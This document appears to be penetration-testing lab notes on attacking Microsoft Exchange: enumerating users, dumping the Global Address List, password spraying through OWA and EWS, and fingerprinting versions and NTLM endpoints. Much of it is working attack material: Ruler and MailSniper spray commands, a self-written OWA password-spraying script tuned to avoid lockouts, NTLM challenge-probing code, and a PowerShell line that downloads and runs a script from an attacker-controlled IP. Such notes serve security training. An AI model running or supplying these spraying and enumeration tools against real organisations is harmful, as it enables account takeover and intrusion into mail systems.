Exchange Enumeration
1. Exchange Overview
Microsoft Exchange can be reached through several clients and APIs, such as Exchange Web Services (EWS), Outlook Web App (OWA), MAPI over HTTP, and Exchange ActiveSync (EAS). EWS is a SOAP-over-HTTP protocol that many different applications can use.
| Service (component) | Description |
|---|---|
| AutoDiscover | A mechanism that lets a client locate and configure its connection to the Exchange server given only a username and password. |
| Outlook Web App (OWA) | The browser-based email client. |
| Global Address List (GAL) | A directory containing the email addresses of all mail-enabled users in Active Directory. |
| Outlook Rules | A set of triggers that run automatically on mail when preset conditions are met. |
Most organizations expose a public-facing Exchange login service such as Outlook Web App, usually reachable at mail.company.org or company.org/owa. This lets users work with Exchange without installing a client locally, and it gives an attacker an Internet-facing endpoint that accepts domain credentials.
2. Enumerating Exchange
2.1. User Enumeration
Below is an example list of employee full names, the usual starting point for building a username wordlist:
Orval Hodge
Rosie Olsen
Juliette Hull
Wallace Moss
Enid Quinn
Amelia Gross
Tammi Solis
Alma Barber
Gale Dawson
Monroe Novak
2.1.1. Generating a username wordlist with username-anarchy
Here we use username-anarchy to turn the list of names into candidate usernames in the common corporate formats:
git clone https://github.com/urbanadventurer/username-anarchy.git
┌──(root㉿kali)-[~/…/htb/Academy/exchange/username-anarchy]
└─# ./username-anarchy --input-file user.txt
orval
orvalhodge
orval.hodge
orvalhod
orvahodg
orvalh
o.hodge
ohodge
horval
h.orval
hodgeo
hodge
hodge.o
hodge.orval
oh
rosie
rosieolsen
rosie.olsen
rosieols
rosiolse
rosieo
<SNIP>
We can also list the supported formats with --list-formats (and restrict generation to specific ones with --select-format):
┌──(root㉿kali)-[~/…/htb/Academy/exchange/username-anarchy]
└─# ./username-anarchy --list-formats
Plugin name Example
--------------------------------------------------------------------------------
first anna
firstlast annakey
first.last anna.key
firstlast[8] annakey
first[4]last[4] annakey
firstl annak
f.last a.key
flast akey
lfirst kanna
l.first k.anna
lastf keya
last key
last.f key.a
last.first key.anna
FLast AKey
first1 anna0,anna1,anna2
fl ak
fmlast abkey
firstmiddlelast annaboomkey
fml abk
FL AK
FirstLast AnnaKey
First.Last Anna.Key
Last Key
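As an added example (my own code, not part of the original notes or of username-anarchy), the following Python reimplements the format expansion above so the permutation rules are explicit. It goes slightly beyond the tool's listing: it strips apostrophes and hyphens from names (O'Neil becomes oneil), uses middle-name initials for the fml/fmlast formats, and can append a mail domain. Format names mirror the --list-formats output; the name list is the one from 2.1.

```python
import re

# Format name -> builder(first, middle_initials, last). Names follow the
# --list-formats table above; the builders are my own implementation.
FORMATS = {
    "first":           lambda f, m, l: f,
    "firstlast":       lambda f, m, l: f + l,
    "first.last":      lambda f, m, l: f"{f}.{l}",
    "firstlast[8]":    lambda f, m, l: (f + l)[:8],
    "first[4]last[4]": lambda f, m, l: f[:4] + l[:4],
    "firstl":          lambda f, m, l: f + l[0],
    "f.last":          lambda f, m, l: f"{f[0]}.{l}",
    "flast":           lambda f, m, l: f[0] + l,
    "lfirst":          lambda f, m, l: l[0] + f,
    "l.first":         lambda f, m, l: f"{l[0]}.{f}",
    "lastf":           lambda f, m, l: l + f[0],
    "last":            lambda f, m, l: l,
    "last.f":          lambda f, m, l: f"{l}.{f[0]}",
    "last.first":      lambda f, m, l: f"{l}.{f}",
    "fl":              lambda f, m, l: f[0] + l[0],
    "fmlast":          lambda f, m, l: f[0] + m + l,
    "fml":             lambda f, m, l: f[0] + m + l[0],
}

def name_parts(full_name):
    """Split 'First [Middle ...] Last' into (first, middle initials, last),
    lower-cased and stripped of characters that never survive in usernames."""
    parts = [re.sub(r"[^a-z0-9]", "", p) for p in full_name.lower().split()]
    parts = [p for p in parts if p]
    if len(parts) < 2:
        raise ValueError(f"need at least first and last name: {full_name!r}")
    middle = "".join(p[0] for p in parts[1:-1])
    return parts[0], middle, parts[-1]

def candidates(full_name, formats=None, domain=None):
    """Username candidates for one person, in FORMATS order, de-duplicated
    (fmlast collapses into flast when there is no middle name)."""
    first, middle, last = name_parts(full_name)
    out, seen = [], set()
    for fmt in formats or FORMATS:
        value = FORMATS[fmt](first, middle, last)
        if domain:
            value = f"{value}@{domain}"
        if value not in seen:
            seen.add(value)
            out.append(value)
    return out

def build_wordlist(full_names, formats=None, domain=None):
    """Wordlist for many people; duplicates across people are dropped so a
    spray loop never hits the same account twice in one round."""
    out, seen = [], set()
    for name in full_names:
        for value in candidates(name, formats, domain):
            if value not in seen:
                seen.add(value)
                out.append(value)
    return out

# Sample input: the names from section 2.1 (the user.txt fed to username-anarchy).
SAMPLE_NAMES = ["Orval Hodge", "Rosie Olsen", "Juliette Hull", "Wallace Moss",
                "Enid Quinn", "Amelia Gross", "Tammi Solis", "Alma Barber",
                "Gale Dawson", "Monroe Novak"]

if __name__ == "__main__":
    # Usage: emit f.last addresses for the sample names, ready for Ruler/MailSniper.
    for line in build_wordlist(SAMPLE_NAMES, ["f.last"], domain="inlanefreight.local"):
        print(line)
```

Pass a short list to formats once you know the target's convention (the GAL dump in 2.2 shows it is f.last here); spraying every format multiplies the number of logon attempts and the lockout risk for nothing.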
2.2. Dumping User Email Addresses
If we already have a foothold on a domain-joined machine or a set of valid mailbox credentials, we can dump the Global Address List directly instead of guessing usernames.
2.2.1. On Linux
On Linux, the global-address-list-owa script logs in to OWA and pulls the GAL:
wget -q https://raw.githubusercontent.com/pigeonburger/global-address-list-owa/main/emailextract.py
python3 emailextract.py -i exch01.inlanefreight.local -u htb-student@inlanefreight.local -p 'HTB_@cademy_stdnt!'
Connecting to exch01.inlanefreight.local/owa
Login Successful!
Canary key: lmj6izRyEk66IpjRQjD-mCCTTv9QvNwI181R0T8_pNdWVLyFHPdR61sYLyyKUTJHj0Le0ZqezYk.
Global List Address ID: e145c509-4761-4507-a92b-e5f76a19daea
Administrator@inlanefreight.local
AllCompany@inlanefreight.local
a.barber@inlanefreight.local
a.gross@inlanefreight.local
d.smitt@inlanefreight.local
e.quinn@inlanefreight.local
g.dawson@inlanefreight.local
...SNIP...
2.2.2. On Windows
On Windows, MailSniper's Get-GlobalAddressList (or PowerView, which can read the mail attribute straight from Active Directory) retrieves the address list:
PS C:\Tools> IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.228:8000/MailSniper.ps1')
PS C:\Tools> Get-GlobalAddressList -ExchHostname exch01.inlanefreight.local -Username htb-student -Password 'HTB_@cademy_stdnt!' -OutFile globaladdresslist.txt
[*] First trying to log directly into OWA to enumerate the Global Address List using FindPeople...
[*] This method requires PowerShell Version 3.0
[*] Using https://exch01.inlanefreight.local/owa/auth.owa
[*] Logging into OWA...
[*] OWA login appears to have failed.
[*] FindPeople method failed. Trying Exchange Web Services...
[*] Trying Exchange version Exchange2010
[*] Using EWS URL https://exch01.inlanefreight.local/EWS/Exchange.asmx
[*] Now attempting to gather the Global Address List. This might take a while...
Administrator@inlanefreight.local
AllCompany@inlanefreight.local
a.barber@inlanefreight.local
a.gross@inlanefreight.local
a.barber@inlanefreight.local
g.dawson@inlanefreight.local
e.quinn@inlanefreight.local
g.dawson@inlanefreight.local
...SNIP...
2.3. Password Spraying
Before spraying, try to learn the target's password and lockout policy (see 2.4). If it is unknown, start with a single common pattern such as companyName<YEAR>! or Season<YEAR>!, spray one password against all users per round, and wait at least one lockout observation window between rounds so the failed-logon counters reset.
2.3.1. On Linux (Ruler)
We can use Ruler for password spraying; it can also serve as a user-enumeration tool.
Ruler is a tool that interacts with an Exchange server remotely over MAPI/HTTP or RPC/HTTP. Its main purpose is to abuse client-side Outlook features to obtain a remote shell, but it also supports many commands for accessing or exploiting Exchange, such as adding, deleting and displaying rules, or checking a user's mailbox. Ruler can also use Autodiscover to discover valid email addresses from a given user list and, once valid addresses have been collected, perform password spraying against them. The help menu lists all available functionality:
wget https://github.com/sensepost/ruler/releases/download/2.4.1/ruler-linux64
Spraying (the brute subcommand):
./ruler-linux64 --domain inlanefreight.local --insecure brute --users global_address_list.txt --passwords passwords.txt --verbose -a 4
[+] Starting bruteforce
[+] Trying to Autodiscover domain
[+] 0 of 3 passwords checked
[x] Failed: Administrator@inlanefreight.local:Inlanefreight2022!
[x] Failed: AllCompany@inlanefreight.local:Inlanefreight2022!
[x] Failed: a.barber@inlanefreight.local:Inlanefreight2022!
[x] Failed: a.gross@inlanefreight.local:Inlanefreight2022!
...SNIP...
brute: tries each user/password pair against Autodiscover and reports the valid combinations. --insecure: skip TLS certificate validation (self-signed certificate on the lab server). -a: number of attempts per user before Ruler pauses; pair it with -d (delay between batches) to stay under the lockout threshold.
2.3.2. On Windows (MailSniper)
We can use MailSniper's Invoke-PasswordSprayOWA or Invoke-PasswordSprayEWS functions to spray a single password against OWA or EWS respectively:
PS C:\Tools> Invoke-PasswordSprayOWA -ExchHostname exch01.inlanefreight.local -UserList .\usernames.txt -Password "Inlanefreight2022!" -OutFile creds.txt
[*] Now spraying the OWA portal at https://exch01.inlanefreight.local/owa/
[*] Current date and time: 08/14/2024 07:21:59
[*] SUCCESS! User:INLANEFREIGHT\exampleUser Password:Inlanefreight2022!
[*] A total of 1 credentials were obtained.
Results have been written to creds.txt.
2.4. Password Policy
Organizations commonly enforce an account lockout policy that triggers after 3 to 5 failed logons, but the exact threshold varies, so check it before spraying.
We can read the default domain policy with PowerView:
PS C:\Users\htb-student\Desktop> (Get-DomainPolicy)."SystemAccess"
MinimumPasswordAge : 1
MaximumPasswordAge : 42
MinimumPasswordLength : 7
PasswordComplexity : 1
PasswordHistorySize : 24
LockoutBadCount : 0
RequireLogonToChangePassword : 0
ForceLogoffWhenHourExpire : 0
ClearTextPassword : 0
LSAAnonymousNameLookup : 0
LockoutBadCount = 0 means account lockout is disabled: accounts will not be locked out no matter how many logons fail. Note that this reflects the Default Domain Policy only; a Fine-Grained Password Policy (PSO) applied to specific users or groups can impose a stricter threshold, so confirm with Get-ADFineGrainedPasswordPolicy -Filter * (or by reading the Password Settings Container with PowerView) before spraying privileged accounts.
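As an added example covering 2.3 and 2.4 together (my own code, not Ruler's or MailSniper's), this Python parses the SystemAccess block above, derives a lockout-safe number of spray rounds per observation window, and runs a spray that tries one password against every user per round and sleeps for a full window before the next batch. The OWA logon function posts the same form fields as the standard /owa/auth/logon.aspx page and treats a cadata session cookie without a reason= redirect as success; those field names and success indicators are assumptions about the target's forms-based authentication and should be confirmed against its logon page. The host, domain and policy text are constructed samples, and since the output above has no observation-window value, it is passed in as a parameter.

```python
import re
import ssl
import time
import urllib.error
import urllib.parse
import urllib.request

# Constructed sample mirroring the (Get-DomainPolicy)."SystemAccess" output above.
SAMPLE_POLICY = """
MinimumPasswordAge : 1
MaximumPasswordAge : 42
MinimumPasswordLength : 7
PasswordComplexity : 1
PasswordHistorySize : 24
LockoutBadCount : 0
RequireLogonToChangePassword : 0
"""

def parse_system_access(text):
    """Turn 'Name : value' lines into {name: int}; other lines are ignored."""
    policy = {}
    for line in text.splitlines():
        m = re.match(r"\s*(\w+)\s*:\s*(-?\d+)\s*$", line)
        if m:
            policy[m.group(1)] = int(m.group(2))
    return policy

def safe_rounds_per_window(policy, margin=2):
    """Spray rounds per observation window that stay under LockoutBadCount,
    keeping a margin for the user's own typos. 0 means lockout is disabled,
    reported as None (no limit)."""
    threshold = policy.get("LockoutBadCount", 0)
    if threshold <= 0:
        return None
    return max(threshold - margin, 1)

def spray(users, passwords, try_login, policy, window_seconds, sleep=time.sleep):
    """One password across all users per round (never several passwords against
    one user back to back). After `safe` rounds, sleep a full observation window
    so bad-password counters reset. Returns [(user, password), ...]."""
    safe = safe_rounds_per_window(policy)
    found, remaining, rounds_in_window = [], list(users), 0
    for password in passwords:
        if safe is not None and rounds_in_window >= safe:
            sleep(window_seconds)
            rounds_in_window = 0
        for user in list(remaining):
            if try_login(user, password):
                found.append((user, password))
                remaining.remove(user)  # stop touching accounts we already own
        rounds_in_window += 1
    return found

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):
        return None  # surface the 302 so we can inspect Location ourselves

def owa_login(base_url, domain, user, password, insecure=True, timeout=15):
    """Forms-based OWA logon attempt. Assumed behaviour: failure redirects back
    to logon.aspx?...&reason=2, success sets the cadata* session cookies."""
    ctx = ssl._create_unverified_context() if insecure else ssl.create_default_context()
    opener = urllib.request.build_opener(_NoRedirect, urllib.request.HTTPSHandler(context=ctx))
    form = urllib.parse.urlencode({
        "destination": f"{base_url}/owa/", "flags": "4", "forcedownlevel": "0",
        "username": f"{domain}\\{user}", "password": password,
        "passwordText": "", "isUtf8": "1",
    }).encode()
    req = urllib.request.Request(f"{base_url}/owa/auth.owa", data=form,
                                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    try:
        headers = opener.open(req, timeout=timeout).headers
    except urllib.error.HTTPError as e:
        headers = e.headers
    cookies = " ".join(headers.get_all("Set-Cookie") or [])
    return "cadata=" in cookies and "reason=" not in headers.get("Location", "")

if __name__ == "__main__":
    import sys
    policy = parse_system_access(SAMPLE_POLICY)
    print("safe rounds per window:", safe_rounds_per_window(policy))
    if len(sys.argv) == 3:  # usage: spray.py https://mail.example.org DOMAIN (illustrative host)
        base, dom = sys.argv[1:]
        attempt = lambda u, p: owa_login(base, dom, u, p)
        print(spray(["a.barber", "e.quinn"], ["Inlanefreight2022!"], attempt, policy, 30 * 60))
```

try_login is injected so the scheduler can be driven by any authenticator (OWA, EWS, Autodiscover) and tested without a network; the window length is the domain's LockoutObservationWindow, which Get-DomainPolicy does not print, so read it from the lockout policy before choosing it.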
2.5. Version Enumeration
Knowing the exact Exchange build lets us pick the vulnerabilities and patches that actually apply to the target.
The eDiscovery export tool is a ClickOnce application whose deployment manifest under /ecp is readable without authentication and carries the server's build number:
┌──(root㉿kali)-[~/…/htb/Academy/exchange/username-anarchy]
└─# curl https://10.129.231.81/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application -k | xmllint --format - | grep version
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 15856 100 15856 0 0 5596 0 0:00:02 0:00:02 --:--:-- 5596
<?xml version="1.0" encoding="utf-8"?>
<assemblyIdentity xmlns="urn:schemas-microsoft-com:asm.v1" name="microsoft.exchange.ediscovery.exporttool.application" version="15.2.721.2" publicKeyToken="1f16bd4ec4c2bb19" language="neutral" processorArchitecture="msil"/>
<assemblyIdentity name="microsoft.exchange.ediscovery.exporttool" version="15.2.721.2" publicKeyToken="1f16bd4ec4c2bb19" language="neutral" processorArchitecture="msil" type="win32"/>
<as:assemblyIdentity xmlns="urn:schemas-microsoft-com:asm.v1" name="microsoft.exchange.ediscovery.exporttool.application" version="15.2.721.2" publicKeyToken="1f16bd4ec4c2bb19" language="neutral" processorArchitecture="msil"/>
The manifest reports version 15.2.721.2, which Microsoft's Exchange Server build-number table maps to Exchange Server 2019 CU7. Always cross-check the build against that table and treat it as a lower bound: the manifest tracks the cumulative update and may not change with every security update. The same major.minor.build also appears in the resource paths of the OWA logon page (for example /owa/auth/15.2.721/), which is a quick unauthenticated sanity check.
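As an added example (my own code, not from the original notes or any Exchange tooling), this Python fetches the ClickOnce deployment manifest used above, extracts the version attribute of the exporttool assemblyIdentity with a real XML parser instead of grep, and maps it to a product name. The build table is a partial excerpt of Microsoft's published Exchange build numbers covering the builds mentioned on this page plus a few neighbours; extend it from that table. The manifest below is a constructed sample shaped like the real one, and the host name in the usage is only an illustration.

```python
import ssl
import urllib.request
import xml.etree.ElementTree as ET

MANIFEST_PATH = "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"

# Partial excerpt of Microsoft's Exchange build-number table (extend as needed).
BUILDS = {
    "15.2.721.2": "Exchange Server 2019 CU7",
    "15.2.986.5": "Exchange Server 2019 CU11",
    "15.1.2375.7": "Exchange Server 2016 CU22",
    "15.1.2507.6": "Exchange Server 2016 CU23",
}
# major.minor identifies the product line when the exact build is not in BUILDS.
PRODUCT_LINES = {"15.2": "Exchange Server 2019", "15.1": "Exchange Server 2016",
                 "15.0": "Exchange Server 2013", "14.3": "Exchange Server 2010 SP3"}

def manifest_version(xml_text):
    """Return the version of the *.exporttool.application assemblyIdentity.
    Tags are namespace-qualified (asm.v1 / asm.v2), so match on the local name."""
    root = ET.fromstring(xml_text)
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == "assemblyIdentity" and \
                el.get("name", "").endswith(".exporttool.application"):
            return el.get("version")
    raise ValueError("no exporttool assemblyIdentity in manifest")

def identify(version):
    """Map a build to its CU name, or at least to a product line."""
    if version in BUILDS:
        return BUILDS[version]
    line = PRODUCT_LINES.get(".".join(version.split(".")[:2]))
    return f"{line} (build {version} not in table)" if line else f"unknown build {version}"

def fetch_version(host, insecure=True, timeout=10):
    """GET the manifest over HTTPS; insecure=True mirrors curl -k for self-signed certs."""
    ctx = ssl._create_unverified_context() if insecure else ssl.create_default_context()
    with urllib.request.urlopen(f"https://{host}{MANIFEST_PATH}", context=ctx, timeout=timeout) as r:
        return manifest_version(r.read().decode("utf-8-sig"))  # tolerate a BOM

# Constructed sample shaped like the real manifest (not a capture from a live server).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<asmv1:assembly xmlns:asmv1="urn:schemas-microsoft-com:asm.v1"
    xmlns="urn:schemas-microsoft-com:asm.v2" manifestVersion="1.0">
  <assemblyIdentity name="microsoft.exchange.ediscovery.exporttool.application"
      version="15.2.721.2" publicKeyToken="1f16bd4ec4c2bb19" language="neutral"
      processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1"/>
  <dependency><dependentAssembly dependencyType="install"
      codebase="microsoft.exchange.ediscovery.exporttool.manifest">
    <assemblyIdentity name="microsoft.exchange.ediscovery.exporttool" version="15.2.721.2"
        publicKeyToken="1f16bd4ec4c2bb19" language="neutral" processorArchitecture="msil" type="win32"/>
  </dependentAssembly></dependency>
</asmv1:assembly>"""

if __name__ == "__main__":
    import sys
    # Usage: version.py exch01.inlanefreight.local (illustrative host); no argument parses the sample.
    version = fetch_version(sys.argv[1]) if len(sys.argv) > 1 else manifest_version(SAMPLE_MANIFEST)
    print(version, "->", identify(version))
```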
2.6. NTLM Endpoint Enumeration (ntlmscan)
ntlmscan probes a set of predefined paths from its default paths.dict wordlist and reports the endpoints that require NTLM authentication, for example /autodiscover and /ews:
git clone https://github.com/nyxgeek/ntlmscan
ntlmscan can scan a single URL or a whole host. It can also enumerate virtual hosts, which makes it useful for locating OWA, Skype for Business, Autodiscover and ADFS servers:
┌──(root㉿kali)-[~/…/htb/Academy/exchange/ntlmscan]
└─# python3 ntlmscan.py --host https://10.129.231.81
custom dictionary has been set to /root/Desktop/htb/Academy/exchange/ntlmscan/paths.dict
[-] Testing path https://10.129.231.81/abs/
[-] Testing path https://10.129.231.81/ucwa/
[-] Testing path https://10.129.231.81/unifiedmessaging/
[-] Testing path https://10.129.231.81/webticket/
[-] Testing path https://10.129.231.81/webticket/webticketservice.svc
[-] Testing path https://10.129.231.81/_windows/default.aspx?ReturnUrl=/
[-] Testing path https://10.129.231.81/
[-] Testing path https://10.129.231.81/
[+] FOUND NTLM - https://10.129.231.81/oab/
[+] FOUND NTLM - https://10.129.231.81/rpc/
[+] FOUND NTLM - https://10.129.231.81/ews/
[+] FOUND NTLM - https://10.129.231.81/autodiscover/
Testing complete
We can also run the http-ntlm-info Nmap script against the HTTPS service. Pointing http-ntlm-info.root at one of the NTLM-protected paths makes it send an NTLM negotiate message and decode the server's challenge, which reveals the domain name, computer name, DNS tree and OS build without any credentials:
┌──(root㉿kali)-[~/…/htb/Academy/exchange/ntlmscan]
└─# nmap -sV --script http-ntlm-info --script-args http-ntlm-info.root=/ews/ -p443 10.129.231.81
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-16 10:22 EDT
Nmap scan report for EXCH01.inlanefreight.local (10.129.231.81)
Host is up (0.28s latency).
PORT STATE SERVICE VERSION
443/tcp open ssl/https
|_http-server-header: Microsoft-IIS/10.0
| http-ntlm-info:
| Target_Name: INLANEFREIGHT
| NetBIOS_Domain_Name: INLANEFREIGHT
| NetBIOS_Computer_Name: EXCH01
| DNS_Domain_Name: inlanefreight.local
| DNS_Computer_Name: EXCH01.inlanefreight.local
| DNS_Tree_Name: inlanefreight.local
|_ Product_Version: 10.0.17763
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.65 seconds
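As an added example tying together the ntlmscan and http-ntlm-info steps (my own code, not from either tool or the original notes), this Python sends an NTLM NEGOTIATE_MESSAGE to a URL and decodes the CHALLENGE_MESSAGE that an NTLM-protected endpoint returns in its WWW-Authenticate header: the target name, the AV_PAIR target info (NetBIOS and DNS names, tree name) and the Version block, which is where the 10.0.17763 in the Nmap output comes from. A constructed challenge for EXCH01 is included so the parser can be exercised offline; the URL in the usage is only an illustration.

```python
import base64
import ssl
import struct
import urllib.error
import urllib.request

SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001
NEGOTIATE_VERSION = 0x02000000
# Type 1 flags: UNICODE|OEM|REQUEST_TARGET|NTLM|ALWAYS_SIGN|EXTENDED_SESSIONSECURITY|VERSION.
# VERSION asks the server to include its OS build in the challenge.
TYPE1_FLAGS = 0x02088207
AV_NAMES = {1: "NetBIOS_Computer_Name", 2: "NetBIOS_Domain_Name",
            3: "DNS_Computer_Name", 4: "DNS_Domain_Name", 5: "DNS_Tree_Name"}

def build_type1(flags=TYPE1_FLAGS):
    """NEGOTIATE_MESSAGE with empty domain/workstation fields (offset 40 = end of
    the 40-byte header) and a Version block, since NEGOTIATE_VERSION is set."""
    header = SIGNATURE + struct.pack("<II", 1, flags)
    fields = struct.pack("<HHI", 0, 0, 40) * 2
    version = struct.pack("<BBH3xB", 10, 0, 0, 15)  # claim Windows 10, NTLMSSP revision 15
    return header + fields + version

def parse_type2(blob):
    """Decode a CHALLENGE_MESSAGE (MS-NLMP 2.2.1.2) into the fields Nmap prints."""
    if blob[:8] != SIGNATURE or struct.unpack_from("<I", blob, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    tn_len, _, tn_off = struct.unpack_from("<HHI", blob, 12)
    flags = struct.unpack_from("<I", blob, 20)[0]
    ti_len, _, ti_off = struct.unpack_from("<HHI", blob, 40)
    charset = "utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii"
    info = {"Target_Name": blob[tn_off:tn_off + tn_len].decode(charset),
            "Server_Challenge": blob[24:32].hex(), "Negotiate_Flags": flags}
    if flags & NEGOTIATE_VERSION and len(blob) >= 56:
        major, minor, build = struct.unpack_from("<BBH", blob, 48)
        info["Product_Version"] = f"{major}.{minor}.{build}"
    pos, end = ti_off, ti_off + ti_len
    while pos + 4 <= end:  # AV_PAIR list: AvId, AvLen, Value ... terminated by MsvAvEOL
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:
            break
        value = blob[pos:pos + av_len]
        pos += av_len
        if av_id in AV_NAMES:
            info[AV_NAMES[av_id]] = value.decode("utf-16-le")  # AV strings are always UTF-16LE
        elif av_id == 7 and av_len == 8:
            info["Timestamp"] = struct.unpack("<Q", value)[0]  # FILETIME
    return info

def probe(url, insecure=True, timeout=10):
    """Send the Type 1 token; an NTLM endpoint answers 401 with a Type 2 token."""
    token = base64.b64encode(build_type1()).decode()
    req = urllib.request.Request(url, headers={"Authorization": "NTLM " + token})
    ctx = ssl._create_unverified_context() if insecure else ssl.create_default_context()
    try:
        urllib.request.urlopen(req, context=ctx, timeout=timeout)
    except urllib.error.HTTPError as e:
        for value in e.headers.get_all("WWW-Authenticate") or []:
            if value.startswith("NTLM "):
                return parse_type2(base64.b64decode(value[5:]))
    return None  # no challenge: the path does not offer NTLM

def build_type2_sample():
    """Constructed CHALLENGE_MESSAGE for EXCH01 (not a capture), for offline use."""
    target_name = "INLANEFREIGHT".encode("utf-16-le")
    pairs = [(2, "INLANEFREIGHT"), (1, "EXCH01"), (4, "inlanefreight.local"),
             (3, "EXCH01.inlanefreight.local"), (5, "inlanefreight.local")]
    target_info = b""
    for av_id, text in pairs:
        encoded = text.encode("utf-16-le")
        target_info += struct.pack("<HH", av_id, len(encoded)) + encoded
    target_info += struct.pack("<HH", 0, 0)  # MsvAvEOL
    flags = 0xE2898205  # UNICODE|REQUEST_TARGET|NTLM|ALWAYS_SIGN|TARGET_TYPE_DOMAIN|ESS|TARGET_INFO|VERSION|128|KEY_EXCH|56
    msg = SIGNATURE + struct.pack("<I", 2)
    msg += struct.pack("<HHI", len(target_name), len(target_name), 56)
    msg += struct.pack("<I", flags) + bytes.fromhex("0123456789abcdef") + b"\x00" * 8
    msg += struct.pack("<HHI", len(target_info), len(target_info), 56 + len(target_name))
    msg += struct.pack("<BBH3xB", 10, 0, 17763, 15)  # Windows Server 2019, build 17763
    return msg + target_name + target_info

if __name__ == "__main__":
    import sys
    # Usage: ntlminfo.py https://10.129.231.81/ews/ (illustrative); no argument decodes the sample.
    info = probe(sys.argv[1]) if len(sys.argv) > 1 else parse_type2(build_type2_sample())
    for key, value in (info or {}).items():
        print(f"{key}: {value}")
```

Because the challenge is returned before any credential is checked, this leaks the internal domain, host name and OS build to anyone who can reach the endpoint; the same probe run across the ntlmscan hit list tells you which paths to feed to password spraying and which hosts belong to which domain.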
